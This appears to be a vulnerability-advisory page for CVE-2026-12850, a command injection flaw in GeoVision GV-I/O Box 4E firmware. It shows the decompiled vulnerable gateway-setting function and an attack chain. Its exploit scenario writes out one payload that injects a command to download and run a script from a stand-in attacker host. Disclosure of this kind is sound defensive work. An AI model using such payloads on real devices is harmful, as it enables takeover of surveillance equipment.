Skip to main content

GeoVision GV-I/O Box 4E CVE-2026-12850

| EUVDEUVD-2026-38652 CRITICAL
OS Command Injection (CWE-78)
2026-06-24 GV GHSA-4rcp-78rq-p2c3
9.1
CVSS 3.1 · Vendor: GV
Share

Severity by source

Vendor (GV) PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.1 CRITICAL

Network-reachable management endpoints (AV:N, AC:L), administrative auth required to invoke gateway config (PR:H), system() shell breakout escapes the service context (S:C) with full C/I/A impact.

3.1 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

Primary rating from Vendor (GV).

CVSS VectorVendor: GV

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

1
Analysis Generated
Jun 24, 2026 - 05:32 vuln.today

DescriptionCVE.org

Multiple OS command injection vulnerabilities exist in the libNetSetObj.so functionality of GeoVision GV-I/O Box 4E 2.09. A specially crafted network packet can lead to command execution. An attacker can send a network request to trigger this vulnerability.

libNetSetObj.so is an internal library used by various binaries on the device to configure the network stack (start and stop various services, configure IP, Netmask, gateway, dns, etc.)

CNetSetObj::m_F_n_Set_Gate_way command injection

The following function takes a string as a gatewy address, performs no sanitization on it and calls system. This is a classic command injection vulnerability. The function is reachable from both the network-exposed DVRSearch service and the Network.cgi endpoint.

int __fastcall CNetSetObj::m_F_n_Set_Gate_way(const char **this, char *gw, char *dev)

{

char s[324]; // [sp+4h] [bp-144h] BYREF

if ( !dev && !*this || !gw )

return 0;

system("/sbin/route del -net 224.0.0.0 netmask 224.0.0.0");

system("/sbin/route del default ");

if ( dev )

sprintf(s, "/sbin/route add default gw %s dev %s", gw, dev); //attacker controlled gw string

else

sprintf(s, "/sbin/route add default gw %s dev %s", gw, *this); //attacker controlled gw string

system(s);

sprintf(s, "/sbin/route add -net 224.0.0.0 netmask 224.0.0.0 gw %s dev %s", gw, *this); //attacker controlled gw string

system(s);

return 1;

}

AnalysisAI

OS command injection in GeoVision GV-I/O Box 4E firmware 2.09 allows authenticated remote attackers to execute arbitrary shell commands via unsanitized gateway address input passed to system() inside libNetSetObj.so. The flaw is reachable through both the network-exposed DVRSearch service and the Network.cgi endpoint, granting full device compromise. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach GV-I/O Box 4E management interface
Delivery
Authenticate to DVRSearch or Network.cgi
Exploit
Submit gateway value with shell metacharacters
Execution
Trigger CNetSetObj::m_F_n_Set_Gate_way sprintf into system()
Persist
Execute injected command on device
Impact
Pivot into surveillance network

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to reach the GV-I/O Box 4E management plane - specifically the DVRSearch network service or the Network.cgi HTTP endpoint - and to invoke the gateway-setting routine in CNetSetObj::m_F_n_Set_Gate_way with a crafted gw parameter containing shell metacharacters. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The 9.1 Critical CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H reflects network-reachable, low-complexity exploitation with scope change once code runs as the system() child, but PR:H tempers the practical risk because an attacker must already hold privileged access to the device's management interface. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with administrative credentials, or a foothold on the LAN where the GV-I/O Box 4E exposes Network.cgi and DVRSearch, submits a gateway value such as 1.1.1.1;wget http://attacker/x|sh when invoking the network configuration routine. The unsanitized string is passed through sprintf into system() inside libNetSetObj.so, executing the appended shell command as the device process and yielding code execution on the appliance.
Remediation Patch availability is not confirmed in the supplied data, so treat this as no vendor-released patch identified at time of analysis pending direct confirmation from https://www.geovision.com.tw/cyber_security.php and the Talos report at https://talosintelligence.com/vulnerability_reports/TALOS-2026-2379. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all GeoVision GV-I/O Box 4E devices running firmware 2.09 and document network connectivity. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-12850 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy